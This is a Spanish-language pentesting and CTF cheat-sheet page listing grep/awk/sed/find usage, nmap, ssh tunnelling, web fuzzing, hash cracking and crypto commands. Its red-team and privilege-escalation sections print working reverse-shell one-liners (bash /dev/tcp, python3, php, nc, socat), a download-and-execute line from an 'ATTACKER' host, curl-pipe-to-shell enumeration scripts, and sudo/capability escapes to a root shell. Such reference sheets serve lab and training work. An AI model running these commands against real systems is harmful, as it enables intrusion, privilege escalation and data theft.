// text processing

grep · awk · sed · find
grepsearch patterns
grep -r "pattern" /pathrecursivo
grep -i "pattern" filecase-insensitive
grep -v "pattern" fileinvertir match
grep -n "pattern" filecon nº de línea
grep -E "pat1|pat2"regex extendida
grep -o "pattern" filesolo el match
grep -A 3 -B 3 "pat"contexto ±3 líneas
grep -l "pattern" *solo nombres ficheros
awktext processing
awk '{print $1}' file1ª columna
awk -F: '{print $1}' /etc/passwdsep ":"
awk 'NR==5' filelínea 5
awk '/pattern/{print $2}'filtro + col
awk '{sum+=$1} END{print sum}'suma columna
awk 'length($0) > 80'líneas largas
awk '{print NF, $0}'nº campos
awk '!seen[$0]++'deduplicar
sedstream editor
sed 's/old/new/g' filereplace global
sed -i 's/old/new/g' filein-place
sed -n '5,10p' filelíneas 5 a 10
sed '/pattern/d' fileborrar líneas
sed 's/^/# /' filecomentar líneas
sed '/^$/d' fileborrar vacías
sed -n '/pat/,/pat2/p'rango entre patrones
sed 'G' filedoble espaciado
findfile hunting
find / -name "*.conf" 2>/dev/nullbuscar configs
find / -perm -4000 2>/dev/nullbinarios SUID
find / -perm -2000 2>/dev/nullbinarios SGID
find / -writable -type f 2>/dev/nullficheros escribibles
find / -mmin -60 2>/dev/nullmodificados última hora
find . -size +10Mficheros grandes
find / -user root -writable 2>/dev/nullroot + writable
find / -nouser 2>/dev/nullsin propietario
sort · uniq · cut · trpipeline tools
sort -u fileordenar + unique
sort -rn filenumérico inverso
sort -t: -k3 -n filepor campo 3
uniq -c | sort -rncontar + ordenar
cut -d: -f1,3 filecampos 1 y 3
tr 'a-z' 'A-Z'uppercase
tr -d '\r'quitar CR (Windows)
tr -s ' ' '\t'spaces a tabs
xargs · tee · wc · diffpipeline helpers
xargs -I{} cmd {} fileplaceholder
find . -name "*.py" | xargs grep "pass"buscar en varios
cmd | tee output.logstdout + fichero
wc -l filecontar líneas
tail -f /var/log/sysloglive log
tail -n +2 fileskip 1ª línea (header)
head -c 1024 fileprimeros 1024 bytes
diff file1 file2diferencias

// red team & network

nmap · nc · curl · ssh
nmapport scanning
nmap -sV -sC -oA scan targetversiones + scripts
nmap -p- --min-rate 5000 targettodos los puertos
nmap -sU --top-ports 200 targetUDP top 200
nmap --script vuln targetscan vulns
nmap -sn 192.168.1.0/24ping sweep
nmap -O targetOS detection
nmap --script smb-vuln* targetSMB vulns
nmap -sC -sV -p 80,443,8080web ports
netcat & socatswiss knife
nc -lvnp 4444listener
nc target 4444 -e /bin/bashreverse shell
nc -zv target 20-100port scan range
socat TCP-LISTEN:4444,fork EXEC:/bin/bashsocat shell
nc target 4444 < /etc/passwdenviar fichero
mkfifo /tmp/f; nc -lvp 4444 </tmp/f | /bin/bash >/tmp/fshell interactiva
socat TCP:target:4444 PTY,raw,echo=0shell con pty
curl & wgetHTTP tools
curl -I urlsolo headers
curl -X POST -d "data" urlPOST data
curl -b "cookie=val" urlcon cookie
curl -H "Auth: Bearer TOKEN" urlheader JWT
curl -k https://targetskip SSL verify
curl -x http://127.0.0.1:8080 urlvia Burp proxy
wget -r -np -nH urlmirror site
curl -s url | python3 -m json.toolpretty JSON
ssh tunnelingport forwarding
ssh -L 8080:target:80 user@jumplocal forward
ssh -R 4444:localhost:4444 user@vpsremote forward
ssh -D 1080 user@hostSOCKS5 proxy
ssh -N -f -L 5432:db:5432 user@hostbackground
ssh -J jump user@internalProxyJump
sshuttle -r user@host 192.168.1.0/24VPN over SSH
ffuf · gobusterweb fuzzing
ffuf -w wordlist -u http://target/FUZZdir bruteforce
ffuf -w list -u url -H "Host: FUZZ.target"vhost enum
ffuf -w list -u url?id=FUZZ -fc 403param fuzz
gobuster dir -u url -w list -x php,htmlextensiones
gobuster dns -d domain -w listsubdomain enum
feroxbuster -u url -w list --depth 3recursivo
reverse shellsone-liners
bash -i >& /dev/tcp/IP/4444 0>&1bash
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("IP",4444));[os.dup2(s.fileno(),i) for i in range(3)];subprocess.call(["/bin/sh","-i"])'python3
php -r '$s=fsockopen("IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'php
python3 -c 'import pty; pty.spawn("/bin/bash")'upgrade shell
stty raw -echo; fgshell completa (tras Ctrl+Z)
export TERM=xterm; stty rows 40 cols 150fix tamaño terminal

// privilege escalation

sudo · SUID · cron · caps
sudo checksGTFOBins
sudo -lpermisos sudo del usuario
sudo vim -c ':!/bin/bash'vim a shell
sudo less /etc/passwd > !/bin/shless a shell
sudo awk 'BEGIN {system("/bin/bash")}'awk a shell
sudo python3 -c 'import os;os.system("/bin/bash")'python a shell
sudo find . -exec /bin/bash \; -quitfind a shell
sudo env /bin/bashenv a shell
sudo nmap --interactive > !/bin/shnmap a shell
linux enumrecon local
id; whoami; groupsusuario actual
cat /etc/passwd | grep -v nologinusuarios con shell
uname -a; cat /etc/os-releaseOS + kernel
ps aux --forestprocesos en árbol
ss -tulnppuertos abiertos
crontab -l; cat /etc/cron*tareas cron
env; printenvvariables de entorno
cat /etc/sudoers 2>/dev/nullfichero sudoers
capabilitieslinux caps
getcap -r / 2>/dev/nullbuscar capabilities
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'cap_setuid
cat /proc/1/status | grep Capcaps del proceso
capsh --decode=0000003fffffffffdecodificar caps
scripts de enumautomated
curl -L https://github.com/carlospolop/peass-ng/releases/latest/download/linpeas.sh | shlinpeas
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bashlinenum
python3 -m http.server 8000servidor rápido
wget http://ATTACKER/linpeas.sh -O /tmp/l.sh && chmod +x /tmp/l.sh && /tmp/l.shdownload + exec
./linpeas.sh | tee /tmp/lp.txtguardar output

// ctf tools

interactive

Base64 encode / decode

resultado aqui

Caesar / ROT cipher

resultado aqui

Hex encode / decode / XOR

resultado aqui

URL / HTML encoding encode / decode

resultado aqui

Hash identifier + generator

Binary / ASCII / Morse converter

resultado aqui
!Magic bytes comunes: PNG=89504E47 · JPG=FFD8FF · PDF=25504446 · ZIP=504B0304 · ELF=7F454C46
!Stego rapido: strings file | grep flag · binwalk -e file · foremost file · exiftool file · zsteg file.png
!CTF quick-wins: file * · xxd file | head · strings -n 8 file · buscar la flag con grep -r "HTB{" .

// crypto & hashing

openssl · hashcat · john
opensslcrypto swiss knife
openssl s_client -connect target:443SSL info
openssl x509 -in cert.pem -text -nooutleer cert
openssl genrsa -out key.pem 2048generar RSA key
openssl enc -aes-256-cbc -in file -out enccifrar AES
openssl enc -d -aes-256-cbc -in encdescifrar AES
openssl dgst -sha256 fileSHA256 hash
openssl passwd -6 passwordSHA512crypt hash
hashcatcracking
hashcat -m 0 hash.txt wordlistMD5
hashcat -m 1000 hash.txt wordlistNTLM
hashcat -m 1800 hash.txt wordlistsha512crypt
hashcat -m 0 -a 3 hash "?a?a?a?a?a"mask attack
hashcat -m 0 -r rules/best64.rule hash wlcon reglas
hashcat --show hash.txtmostrar crackeados
john --wordlist=wl --format=sha512crypt hashjohn
tipos de hashhashcat -m modes
d41d8cd98f00b204e9800998ecf8427eMD5 32hex (-m 0)
da39a3ee5e6b4b0d3255bfef95601890afd80709SHA1 40hex (-m 100)
e3b0c44298fc1c149afbf4c8996fb92427...SHA256 64hex (-m 1400)
$1$salt$hashMD5crypt (-m 500)
$5$salt$hashSHA256crypt (-m 7400)
$6$salt$hashSHA512crypt (-m 1800)
$2y$10$...bcrypt (-m 3200)
aad3b435b51404eeaad3b435b51404eeNTLM vacio

// regex tester

live · interactive
0 coincidencias
resultado aqui

// misc tools

permisos · subred · cron

Calculadora de permisos Unix

owner (u)
group (g)
others (o)
644
-rw-r--r--
chmod 644 fichero

Calculadora de subred IPv4

Cron builder 5 campos

0 * * * *